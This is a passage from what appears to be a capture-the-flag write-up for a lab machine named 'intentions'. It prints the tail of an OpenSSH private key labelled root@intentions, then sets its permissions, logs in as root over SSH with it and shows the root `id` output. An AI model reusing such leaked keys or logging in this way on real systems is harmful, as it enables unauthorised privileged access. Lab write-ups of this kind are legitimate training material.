PknyAdy792vSIuJrmdKhvRTEUwvntZGXrKtwnf81SX/ZMDRJYqgCQyf5vnUtjKznvohz2R
0i4lakvtXQYC/NNc1QccjTL2NID4nSOhLH2wYzZhKku1vlRmK13HP5BRS0Jus8ScVaYaIS
bEDknHVWHFWndkuQSG2EX9a2auy7oTVCSu7bUXFnottatOxo1atrasNOWcaNkRgdehAAAA
wQDUQfNZuVgdYWS0iJYoyXUNSJAmzFBGxAv3EpKMliTlb/LJlKSCTTttuN7NLHpNWpn92S
pNDghhIYENKoOUUXBgb26gtg1qwzZQGsYy8JLLwgA7g4RF3VD2lGCT377lMD9xv3bhYHPl
lo0L7jaj6PiWKD8Aw0StANo4vOv9bS6cjEUyTl8QM05zTiaFk/UoG3LxoIDT6Vi8wY7hIB
AhDZ6Tm44Mf+XRnBM7AmZqsYh8nw++rhFdr9d39pYaFgok9DcAAADBAO1D0v0/2a2XO4DT
AZdPSERYVIF2W5TH1Atdr37g7i7zrWZxltO5rrAt6DJ79W2laZ9B1Kus1EiXNYkVUZIarx
Yc6Mr5lQ1CSpl0a+OwyJK3Rnh5VZmJQvK0sicM9MyFWGfy7cXCKEFZuinhS4DPBCRSpNBa
zv25Fap0Whav4yqU7BsG2S/mokLGkQ9MVyFpbnrVcnNrwDLd2/whZoENYsiKQSWIFlx8Gd
uCNB7UAUZ7mYFdcDBAJ6uQvPFDdphWPQAAAMEA+WN+VN/TVcfYSYCFiSezNN2xAXCBkkQZ
X7kpdtTupr+gYhL6gv/A5mCOSvv1BLgEl0A05BeWiv7FOkNX5BMR94/NWOlS1Z3T0p+mbj
D7F0nauYkSG+eLwFAd9K/kcdxTuUlwvmPvQiNg70Z142bt1tKN8b3WbttB3sGq39jder8p
nhPKs4TzMzb0gvZGGVZyjqX68coFz3k1nAb5hRS5Q+P6y/XxmdBB4TEHqSQtQ4PoqDj2IP
DVJTokldQ0d4ghAAAAD3Jvb3RAaW50ZW50aW9ucwECAw==
-----END OPENSSH PRIVATE KEY-----
ssh证书登录
chmod 600 intentions_id_rsa
ssh -i intentions_id_rsa root@10.10.11.220
root@intentions:~# id
uid=0(root) gid=0(root) groups=0(root)